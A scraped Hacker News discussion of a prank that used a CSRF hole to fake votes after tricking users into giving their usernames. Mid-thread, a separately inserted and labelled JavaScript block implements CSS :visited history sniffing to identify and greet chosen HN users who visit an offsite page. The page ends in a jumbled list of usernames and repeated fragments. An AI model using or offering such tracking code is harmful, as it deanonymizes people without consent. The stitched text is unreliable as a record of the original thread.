Not cool. We deliberately don't put that much effort into security, because this is a community based on trust, not a bank. And by choosing to publish this rather than e.g. simply sending me an email about it, he's inviting people to do this.
I think a lot of people are missing the point here. Sure, what he did wasn't "cool", since it deceived users who are part of a community that is based on trust and responsibility. But he found a potential exploit and instead of using it irresponsibly he brought it to the attention of the community. Maybe the right thing would have been to contact PG. Maybe he takes lessons from the Windows world of bugs... If it's not made public for exploitation, it may never get fixed.
In my opinion this should be looked at as a learning experience for web developers. We need to take these issues/exploits into account when building websites. I'm pretty sure PG accounts for XSS attacks, no? If we trust each other, shouldn't we trust each other enough not to post malicious code? Unfortunately it just doesn't work like that. Security by obscurity is never the answer!
As much as this was done irresponsibly, is a fix planned for this? CSRF is, by now, a widely investigated field of web application development; most of the mystery is gone. To borrow a term from The Old New Thing, it's one of the taxes everybody has to pay.
You wouldn't necessarily need someone to volunteer their username to make this work. This unfixed and ancient (2002!) browser vulnerability leaks information, via the styling of 'visited' links, about other URLs you've visited:
http://seclists.org/bugtraq/2002/Feb/0271.html
In many cases, the only person who will have visited all of...
http://news.ycombinator.com/threads?id=USERNAME
http://news.ycombinator.com/submitted?id=USERNAME
http://news.ycombinator.com/saved?id=USERNAME
http://news.ycombinator.com/user?id=USERNAME
...is USERNAME. So another exploit -- still sneaky but not quite fraudulent, and not especially unique to HN -- would be to design an offsite page that does one or both of (1) greets HN users by name upon their visit; (2) logs which of some chosen set of HN users has visited the page.
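The history-sniffing page gojomo describes, as an added example that is not part of the original thread or of HN's code. For each candidate username it creates links to the four profile pages listed above, styles `:visited` links with a distinctive colour, and reads the computed colour back with `getComputedStyle`; a candidate whose four pages all read as visited is almost certainly the visitor. The colours, the `h` class name, the `sniffVisitors`/`makeDomProbe`/`makeFakeProbe` names and the sample usernames are this example's choices, and the probe is separated from the DOM so the selection logic can be run outside a browser with a constructed stand-in for the history. Note that browsers closed the `getComputedStyle` side of this bug around 2011 by reporting the unvisited style to script, so the DOM probe returns nothing useful in a current browser.

```javascript
// Added example, not code from the thread. CSS :visited history sniffing
// against the HN profile pages listed in the comment above.
const HN = 'http://news.ycombinator.com';            // assumed site origin
const VISITED_COLOR = 'rgb(255, 0, 0)';              // colour our :visited rule assigns
const UNVISITED_COLOR = 'rgb(0, 0, 255)';            // colour for everything else

// The four pages that, per the comment, only USERNAME is likely to have all visited.
const PROFILE_PATHS = ['threads', 'submitted', 'saved', 'user'];

function profileUrls(user) {
  return PROFILE_PATHS.map(p => `${HN}/${p}?id=${encodeURIComponent(user)}`);
}

// probe(url) must return the computed colour of a link pointing at url.
// A candidate counts only when every one of its profile pages reads as visited,
// which filters out people who merely looked at someone else's /user page.
function sniffVisitors(candidates, probe) {
  return candidates.filter(user =>
    profileUrls(user).every(url => probe(url) === VISITED_COLOR));
}

// Real probe for a browser: inject the :visited rule, then create a link per
// URL and read its computed colour. Only informative in a pre-2011 browser.
function makeDomProbe(doc) {
  const style = doc.createElement('style');
  style.textContent =
    `a.h { color: ${UNVISITED_COLOR}; } a.h:visited { color: ${VISITED_COLOR}; }`;
  doc.head.appendChild(style);
  return url => {
    const a = doc.createElement('a');
    a.className = 'h';
    a.href = url;
    doc.body.appendChild(a);
    const colour = doc.defaultView.getComputedStyle(a).color;
    a.remove();
    return colour;
  };
}

// Constructed stand-in for the browser history, so the logic runs under Node.
function makeFakeProbe(visitedUrls) {
  const visited = new Set(visitedUrls);
  return url => (visited.has(url) ? VISITED_COLOR : UNVISITED_COLOR);
}

if (typeof document !== 'undefined') {
  // In a browser: greet the visitor by name, exactly the "sneaky" page described.
  const hits = sniffVisitors(['pg', 'gojomo', 'xach'], makeDomProbe(document));
  console.log(hits.length ? `Hello, ${hits[0]}!` : 'Hello, stranger.');
} else {
  // Under Node: simulate a history where alice visited all four of her pages
  // and bob only glanced at his own /user page (constructed sample input).
  const probe = makeFakeProbe([...profileUrls('alice'), `${HN}/user?id=bob`]);
  console.log(sniffVisitors(['alice', 'bob', 'carol'], probe)); // [ 'alice' ]
}
```

Because the test is four URLs per candidate rather than one, the page has to know its candidate list in advance; that is why the comment calls it "not quite fraudulent" but still a targeted attack on a chosen set of users.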
I fell for the trickery (admittedly my mistake for trusting an unknown website) and submitted my user name, expecting to receive a graph like the page promised.
However, as pg already pointed out it was totally uncool not notifying him before making it public. I am in support of full but responsible disclosure. So maybe he could have published it after informing pg and after the issue had been taken care of.
Taking it public is a fix. Now that this information is public none of us will give out our usernames to external websites, thus ending the problem. In effect Xach could decide between emailing someone hoping they fix the problem, or just fixing it.
I found this whole event funny. I'm also amused that people reacted as negatively to this prank as middle managers at my old $MEGACORP job would.
What's really stupid about all this is that I give fellow users on this site a little bit of trust because I know that many times, they would like advice or help with their projects, or conversely, they have stumbled on something I can learn.
So I don't worry too much about giving my user name out, or entering it into other HN members' apps. I did it, and I'm not worried about it really. It's not like run4yourlives is my bank id or anything.
What bothers me about the whole thing though is that I've now had it confirmed that HN is too big to trust anymore. Whereas before, there was a sense of kinship with people here - none of whom I've ever met - I now have to worry that some of them are just losers looking to exploit my trust.
That's worse than off topic posts and low quality comments really. It's an attack on the fabric of the community, and the value of the users. It's clear now that I must treat HN as I would treat reddit or digg or any other room full of potential idiots; people who would much rather exploit trust than build it.
I don't feel like any trust was violated by xach in showing us this exploit. He clearly wasn't trying to be malicious, so I frankly don't understand all of these people who are so upset about this. It sounds like a lot of pointless whining.
Frankly, if anybody has violated our trust, it's whoever wrote this exploitable code. When I use a site, especially an open source one claimed to be written by good programmers, I expect it to be protected from well-understood exploits. And pg, as the caretaker of the code (and its likely author), needs to do some talking about how "not cool" running easily exploitable code is and take some responsibility.
Honestly, what have you lost? Nothing. The truth is that you shouldn't be trusting a bunch of people you've never met ANYWAY. Nobody's asking you to give them your address or mother's maiden name, but you wouldn't give those out if asked by a fellow member anyway. You should always be wary of sites asking for your information for whatever reason, and just because you trust some of the people on HN doesn't mean there aren't tons more on here that could possibly deceive you.
People seem to react to this like the record companies reacted to Napster. "OH NO! IT'LL KILL US ALL! Screw changing our ancient business model, we'll just SUE 'EM!"
Instead of updating the way you think about HN (and other sites) you choose to put down the person who enlightened you and cast him out as some sort of heretic.
Hackers INVENT, hackers BREAK STUFF, and hackers BRING OUT THE UGLY! Why is Xach getting martyred for being a real hacker?
Besides, he's giving HN huge publicity. Jeff Atwood twittered about this thread.
Well, I think that a room full of idiots is an overstatement. An occasional idiot sure, but even that's beside the point - before this supposed decline of the community, you wouldn't have posted your credit card and social security numbers in the comments, no matter how much trust you placed here.
Am I wrong, or is this just saying HN is CSRF-able? There are commerce apps that are still CSRF-able. And this is a comparatively clumsy attack, since there's no trivial way to get your username blindly.
Yes, I think it's considered CSRF, but indeed it's not as bad as it could have been, since it still requires you know the username of the logged in user.
It's also nowhere near as bad as the state of the Twitter API and apps, which require a username and password. People don't think twice about providing unlimited access to their Twitter account to random websites. Hopefully the OAuth API will fix that.
@pg: I think one solution would be to reject any vote requests with a Referrer header other than news.ycombinator.com
pg | 17 years ago
agotterer | 17 years ago
shadytrees | 17 years ago
tptacek | 17 years ago
joshu | 17 years ago
dag | 17 years ago
AndyKelley | 17 years ago
erlanger | 17 years ago
comster | 17 years ago
ericwaller | 17 years ago
Something to think about for your own applications
gojomo | 17 years ago
http://seclists.org/bugtraq/2002/Feb/0271.html
In many cases, the only person who will have visited all of...
http://news.ycombinator.com/threads?id=USERNAME
http://news.ycombinator.com/submitted?id=USERNAME
http://news.ycombinator.com/saved?id=USERNAME
http://news.ycombinator.com/user?id=USERNAME
tlrobinson | 17 years ago
r11t | 17 years ago
dag | 17 years ago
asdflkj | 17 years ago
http://www.reddit.com/r/programming/comments/67gu9/take_the_...
ajju | 17 years ago
Was that a net gain for you?
critic | 17 years ago
Edit: link http://www.reddit.com/r/programming/comments/854w0/faking_vo...
run4yourlives | 17 years ago
Sad but inevitable I suppose.
chairface | 17 years ago
l0gic | 17 years ago
YuriNiyazov | 17 years ago
tptacek | 17 years ago
tlrobinson | 17 years ago